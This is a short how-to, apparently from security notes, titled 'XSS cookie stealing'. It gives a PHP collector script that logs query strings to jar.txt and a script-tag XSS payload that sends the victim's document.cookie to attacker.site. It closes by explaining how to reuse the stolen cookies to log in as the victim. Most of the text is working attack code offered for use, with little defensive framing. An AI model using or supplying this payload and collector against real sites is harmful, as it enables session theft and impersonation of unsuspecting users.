XSS cookie stealing

Weaponizing XSS


To store cookie on machine.


$browser = $_SERVER['HTTP_USER_AGENT'];

# opens a logfile where we save the query
$fp = fopen('jar.txt','a');

fwrite($fp, $ip.' '.$browser."\n");
fwrite($fp, urldecode($_SERVER['QUERY_STRING']). " \n\n");

Using the PHP file above, if we make a GET request with the following param below, the hereismydata value gets stored in the jar.txt defined above


Using this, we can weaponize the XSS by crafting a payload to send the victim's cookies into the website. And then navigating to attacker.site/jar.txt we will see anyone who has cookies stolen.

<script> var i = new Image(); i.src="http://attacker.site/get.php?cookie="+escape(document.cookie)</script>
//the escape function helps prevent breaking the statement

If a victim triggers the XSS payload, the private cookies would be stolen and sent to the jar.txt file.

We can then use the cookies and impersonate as the user to login.

Last updated